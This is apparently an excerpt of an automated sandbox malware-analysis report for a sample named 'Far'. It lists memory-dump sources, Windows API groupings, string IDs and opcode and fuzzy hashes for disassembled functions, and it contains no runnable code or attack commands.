                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *$.$.
                                                                                                                                                                      • API String ID: 2518042432-2112782162
                                                                                                                                                                      • Opcode ID: 7ae6e2be245aeddca2c0195725dd636afbbec9d989a621de775cf780711f472a
                                                                                                                                                                      • Instruction ID: d46ad6d7fd884bf4ab2db134847db53159fa2f920e3bf23a6f15bbda57e88c37
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae6e2be245aeddca2c0195725dd636afbbec9d989a621de775cf780711f472a
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51DD62F18A59A5FB11EBB6D8011BDA7A0FB84FC8F944035CE5D57B85EF38E0429320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                      • Opcode ID: fb946aec191f3132c6662a59ee05687d82e837f2b2afad4b1d8baf50c6fb7044
                                                                                                                                                                      • Instruction ID: aedd5298385d0e413e51d1558eb131c9c69e2bd09fad10d353331e88c847e3e5
                                                                                                                                                                      • Opcode Fuzzy Hash: fb946aec191f3132c6662a59ee05687d82e837f2b2afad4b1d8baf50c6fb7044
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E31B432B09B0A95FB18EEA6D5607BDA791EF84F88F544035DE4D4BB98EF38D4419310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                      • Opcode ID: bd7c1815c1727510bd4d2c59687871d6f645ecb7b67c54ddc1a508cd09ec4df0
                                                                                                                                                                      • Instruction ID: ac1611c19df1174aa98b6e628e908a55f445a54b19430be67f9b8d2663cf0990
                                                                                                                                                                      • Opcode Fuzzy Hash: bd7c1815c1727510bd4d2c59687871d6f645ecb7b67c54ddc1a508cd09ec4df0
                                                                                                                                                                      • Instruction Fuzzy Hash: 98F0E566A1CB4981EB10EBE1D4553BDA360FBD8F88FA40131CE4D0B254DF3CC4869220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InputSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3431551938-0
                                                                                                                                                                      • Opcode ID: 23ad2a99a27041b75d4a6e08ff9df46d061b1ac21c3fab8cbd992897f1327a9a
                                                                                                                                                                      • Instruction ID: 660b5e942e12d9490abf617b8f4b9f676f1ae31a0472071e86241dc848a2dcd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 23ad2a99a27041b75d4a6e08ff9df46d061b1ac21c3fab8cbd992897f1327a9a
                                                                                                                                                                      • Instruction Fuzzy Hash: 00F0BE6691C6C0C6D3609F55E48076AB7A0F798B8CF906129EB8947B64DB3EC10AAF04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                      • Opcode ID: edf1f0c28d6ef0dfcdff3d413a05a63e7d123ccff5fc012c921d27a4ffbf2bcb
                                                                                                                                                                      • Instruction ID: 24a67bd2048b71cfaf109b2446cdabc4d6512196557816003f017ec8e7103c04
                                                                                                                                                                      • Opcode Fuzzy Hash: edf1f0c28d6ef0dfcdff3d413a05a63e7d123ccff5fc012c921d27a4ffbf2bcb
                                                                                                                                                                      • Instruction Fuzzy Hash: EDE0653260C20595EB446F65D09517DA2A0EB94F94F948031DE1D83342EF7CD4945711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                      • Opcode ID: 3de9ffc50f4e6b18aa57c4de6b9e25af03ee9ccfcb8e96c5c1453a6c1efe1d48
                                                                                                                                                                      • Instruction ID: 3a12a1ab1ee061d42ea57641b9d0599f634eea4d5df305b6eed601fcc609737c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3de9ffc50f4e6b18aa57c4de6b9e25af03ee9ccfcb8e96c5c1453a6c1efe1d48
                                                                                                                                                                      • Instruction Fuzzy Hash: EFC012B1A19655E9EB60DF60D8C41EC2331F70070CFD00022E60A0E46CEF789248D310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3521893082-0
                                                                                                                                                                      • Opcode ID: c066962755f629327aca88249c31a8988b819b8614b7a9f9592194a52f7cd4b7
                                                                                                                                                                      • Instruction ID: 0db73b4434c434d7665157105517b1a54c7aee94346667e58d2c2cb6dbfc313e
                                                                                                                                                                      • Opcode Fuzzy Hash: c066962755f629327aca88249c31a8988b819b8614b7a9f9592194a52f7cd4b7
                                                                                                                                                                      • Instruction Fuzzy Hash: D9A1B332F0DA0996EB14ABA1D8945FD6765BB48FA4FA04334DE2E03BD4EF3C94849750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                      • Opcode ID: 617a1be5dd11bf608c88a10b9df0de3a78dacd87693d9fd6c31de8c6b5f1cf8d
                                                                                                                                                                      • Instruction ID: ff17f0afab9fa13b93fc0a3df0094ebf807c7baa5f8fbc90019743007b478275
                                                                                                                                                                      • Opcode Fuzzy Hash: 617a1be5dd11bf608c88a10b9df0de3a78dacd87693d9fd6c31de8c6b5f1cf8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 72B18F61A0CA0BB1FA75FBE5D8540BCA761BB40F84BD44032D94E0B6A5FF2CE945E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                      • Opcode ID: cc31ee28d4978ba1f41dc595b8e26fdd62ebf26b5052f35aa271b19cd4b59121
                                                                                                                                                                      • Instruction ID: 90a9bb54a56ac36cbd24f34e9943b444e7598e32304afc182d05076519620439
                                                                                                                                                                      • Opcode Fuzzy Hash: cc31ee28d4978ba1f41dc595b8e26fdd62ebf26b5052f35aa271b19cd4b59121
                                                                                                                                                                      • Instruction Fuzzy Hash: 06710532A0DA4992E750ABA1E8942BEB765FB88FA0F904334DD5E43794EF3CD444CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                      • String ID: tooltips_class32
                                                                                                                                                                      • API String ID: 698492251-1918224756
                                                                                                                                                                      • Opcode ID: 1fcb7338df747eb9bd36a521c327ea9645d6f5b2f5e3bdfd7e898ab82031a655
                                                                                                                                                                      • Instruction ID: 9cb23011abfaf590cff11c315e59d74cf24be4d9fc22972b6918aceeb994d972
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fcb7338df747eb9bd36a521c327ea9645d6f5b2f5e3bdfd7e898ab82031a655
                                                                                                                                                                      • Instruction Fuzzy Hash: ACC15F32A08B499AEB14DFA5E4842AEB7B0FB88F84F900035DA5E47755EF7CE441DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3869813825-2766056989
                                                                                                                                                                      • Opcode ID: ef54e6aa7fbf63a5b84003f52682c04f9c9e60e0f74c38117c7fd597ce84d979
                                                                                                                                                                      • Instruction ID: a5a48671b3b48f7d092c4e6624c8fd1b26534f5ed7ba878ba7697ec01ca77231
                                                                                                                                                                      • Opcode Fuzzy Hash: ef54e6aa7fbf63a5b84003f52682c04f9c9e60e0f74c38117c7fd597ce84d979
                                                                                                                                                                      • Instruction Fuzzy Hash: BF819C32E09A46A6E700EFB5D8806AD73A5FB44F88FA04131CE4E97658EF78E845C750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                      • Opcode ID: 10eb298b4592cfb12baa3cb5ee8bba3405a285e3e9f40fce0daf5dfb9c936b84
                                                                                                                                                                      • Instruction ID: 0c26d0cde2d8719f0d55de4852e09e99b61586236ca7885cac1f9f46a5a352f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 10eb298b4592cfb12baa3cb5ee8bba3405a285e3e9f40fce0daf5dfb9c936b84
                                                                                                                                                                      • Instruction Fuzzy Hash: 9112A413B1CA1FA2EA50BBE598555BDE7A0AF98F84BD84531DA4D47781FF3CE401A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                      • API String ID: 258715311-1154884017
                                                                                                                                                                      • Opcode ID: b0ccfcc92f280b140fde0429c7e4e05f2aa26ddc3da764aeec47c0d34a041b44
                                                                                                                                                                      • Instruction ID: d4d5a138c106b580f9d71a1d2a47e43a0fd729079482f5bec839c7485c0317da
                                                                                                                                                                      • Opcode Fuzzy Hash: b0ccfcc92f280b140fde0429c7e4e05f2aa26ddc3da764aeec47c0d34a041b44
                                                                                                                                                                      • Instruction Fuzzy Hash: 8671B432A0DA1692EB10EF61D484AF9A3A8FB84F98F940235DD5D47B94EF3CE444A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                      • API String ID: 2610073882-3931177956
                                                                                                                                                                      • Opcode ID: f55ef38166279536615855d74dc03712ac2634a41312ef37b746dfbcbd42170c
                                                                                                                                                                      • Instruction ID: ad22a5c798b27a79a6168df80c9659a9b401ef5f5f3dd71c3d8c351c117a2ea4
                                                                                                                                                                      • Opcode Fuzzy Hash: f55ef38166279536615855d74dc03712ac2634a41312ef37b746dfbcbd42170c
                                                                                                                                                                      • Instruction Fuzzy Hash: 36026032E0D64AA1EA58BBE5C15427CB360EF45F40FC54135DB8E0BAA5EF2CE655E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                                                                      • String ID: tooltips_class32
                                                                                                                                                                      • API String ID: 2443926738-1918224756
                                                                                                                                                                      • Opcode ID: 60c80d7da8a58668eef097a83da659a82be832d3322740a469600174eab4933e
                                                                                                                                                                      • Instruction ID: 19fab6d37ca18dca0d77dfbc0025bb76b1cda10a383e865e227dd21076cd712b
                                                                                                                                                                      • Opcode Fuzzy Hash: 60c80d7da8a58668eef097a83da659a82be832d3322740a469600174eab4933e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9291AD32A19A4A96EB50DFA1E4847ADB7A1EB48F84F904036DE4D07B58EF3CD045D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1111067124-438819550
                                                                                                                                                                      • Opcode ID: db2ba57503fb27234d7ffb5f89f86847e88a29d8eec6f19cc57009b6debdee2c
                                                                                                                                                                      • Instruction ID: aa679664bcdff7a9a85a54a52693d8e98efc31c81b33fc304837a27e10479383
                                                                                                                                                                      • Opcode Fuzzy Hash: db2ba57503fb27234d7ffb5f89f86847e88a29d8eec6f19cc57009b6debdee2c
                                                                                                                                                                      • Instruction Fuzzy Hash: EF71637261CB8AA1DB10EF51E8801EEA764FB94F84F805031EA8D47756EF3DE545D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

